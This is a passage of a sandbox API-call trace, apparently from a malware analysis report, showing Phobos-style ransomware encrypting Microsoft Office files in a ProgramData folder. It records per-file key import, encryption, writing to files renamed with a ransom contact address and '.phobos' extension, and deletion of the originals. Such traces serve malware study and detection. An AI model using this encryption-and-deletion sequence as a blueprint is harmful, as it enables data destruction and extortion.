(hKey=0xa32c68) returned 1 [0166.104] CloseHandle (hObject=0x14c) returned 1 [0166.105] CloseHandle (hObject=0x158) returned 1 [0166.105] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\DocumentRepository.ico" (normalized: "c:\\programdata\\microsoft\\office\\documentrepository.ico")) returned 1 [0166.106] SetEvent (hEvent=0xe8) returned 1 [0166.106] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.106] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.106] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=48992) returned 1 [0166.106] CloseHandle (hObject=0x158) returned 1 [0166.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll")) returned 0x2020 [0166.106] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.106] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.107] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.107] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.107] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.107] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0166.107] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.107] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbf60, lpOverlapped=0x0) returned 1 [0166.109] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf70, dwBufLen=0xbf70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbf70) returned 1 [0166.110] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbf70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbf70, lpOverlapped=0x0) returned 1 [0166.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0166.111] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.111] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.111] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.111] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.111] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.111] CloseHandle (hObject=0x158) returned 1 [0166.112] CloseHandle (hObject=0x14c) returned 1 [0166.113] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll")) returned 1 [0166.114] SetEvent (hEvent=0xe8) returned 1 [0166.114] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.114] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.114] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=252256) returned 1 [0166.115] CloseHandle (hObject=0x14c) returned 1 [0166.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll")) returned 0x2020 [0166.115] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.115] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.115] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.115] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.115] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0166.115] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.115] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3d960, lpOverlapped=0x0) returned 1 [0166.132] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3d970, dwBufLen=0x3d970 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3d970) returned 1 [0166.134] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3d970, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3d970, lpOverlapped=0x0) returned 1 [0166.138] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0166.138] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.138] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.138] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0166.138] WriteFile (in: hFile=0x158, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.138] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.138] CloseHandle (hObject=0x14c) returned 1 [0166.138] CloseHandle (hObject=0x158) returned 1 [0166.138] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll")) returned 1 [0166.141] SetEvent (hEvent=0xe8) returned 1 [0166.141] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.141] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.141] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=49504) returned 1 [0166.141] CloseHandle (hObject=0x158) returned 1 [0166.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll")) returned 0x2020 [0166.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.142] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0166.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.142] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.142] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.142] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32c68) returned 1 [0166.142] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.142] ReadFile (in: hFile=0x158, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xc160, lpOverlapped=0x0) returned 1 [0166.164] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xc170, dwBufLen=0xc170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xc170) returned 1 [0166.164] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xc170, lpOverlapped=0x0) returned 1 [0166.166] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0166.166] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.166] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.166] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.166] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.166] CryptDestroyKey (hKey=0xa32c68) returned 1 [0166.166] CloseHandle (hObject=0x158) returned 1 [0166.166] CloseHandle (hObject=0x14c) returned 1 [0166.166] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\mor6int.rest.trx_dll")) returned 1 [0166.167] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.167] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.167] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2944352) returned 1 [0166.167] CloseHandle (hObject=0x14c) returned 1 [0166.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll")) returned 0x2020 [0166.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0166.169] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.169] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0166.169] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0166.169] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f50058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0166.208] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xef9ca, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0166.208] ReadFile (in: hFile=0x14c, lpBuffer=0x2f90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2f90058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0166.280] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x28ed60, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb60 | out: lpNewFilePointer=0x0) returned 1 [0166.280] ReadFile (in: hFile=0x14c, lpBuffer=0x2fd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2c9fb6c, lpOverlapped=0x0 | out: lpBuffer=0x2fd0058*, lpNumberOfBytesRead=0x2c9fb6c*=0x40000, lpOverlapped=0x0) returned 1 [0166.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb50, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fbbc | out: phKey=0x2c9fbbc*=0xa327e8) returned 1 [0166.321] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.321] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0070, dwBufLen=0xc0070 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb70*=0xc0070) returned 1 [0166.326] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.326] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb98 | out: lpNewFilePointer=0x0) returned 1 [0166.326] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xc0122, lpNumberOfBytesWritten=0x2c9fba8, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fba8*=0xc0122, lpOverlapped=0x0) returned 1 [0166.342] SetEndOfFile (hFile=0x14c) returned 1 [0166.342] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x28ed60, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0166.342] WriteFile (in: hFile=0x14c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0166.344] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xef9ca, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0166.344] WriteFile (in: hFile=0x14c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0166.347] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb68 | out: lpNewFilePointer=0x0) returned 1 [0166.347] WriteFile (in: hFile=0x14c, lpBuffer=0x301015a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2c9fb74, lpOverlapped=0x0 | out: lpBuffer=0x301015a*, lpNumberOfBytesWritten=0x2c9fb74*=0x40000, lpOverlapped=0x0) returned 1 [0166.348] CloseHandle (hObject=0x14c) returned 1 [0166.348] SetEvent (hEvent=0xe8) returned 1 [0166.348] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.348] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.348] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=226656) returned 1 [0166.348] CloseHandle (hObject=0x14c) returned 1 [0166.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll")) returned 0x2020 [0166.349] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.349] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0166.349] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.349] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0166.349] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0166.349] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0166.349] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.349] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x37560, lpOverlapped=0x0) returned 1 [0166.444] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x37570, dwBufLen=0x37570 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x37570) returned 1 [0166.446] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x37570, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x37570, lpOverlapped=0x0) returned 1 [0166.450] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0166.450] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0166.450] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0166.450] CryptDestroyKey (hKey=0xa32be8) returned 1 [0166.450] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0166.450] CryptDestroyKey (hKey=0xa327e8) returned 1 [0166.450] CloseHandle (hObject=0x14c) returned 1 [0166.450] CloseHandle (hObject=0x194) returned 1 [0166.450] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll")) returned 1 [0166.452] SetEvent (hEvent=0xe8) returned 1 [0166.452] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0166.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" 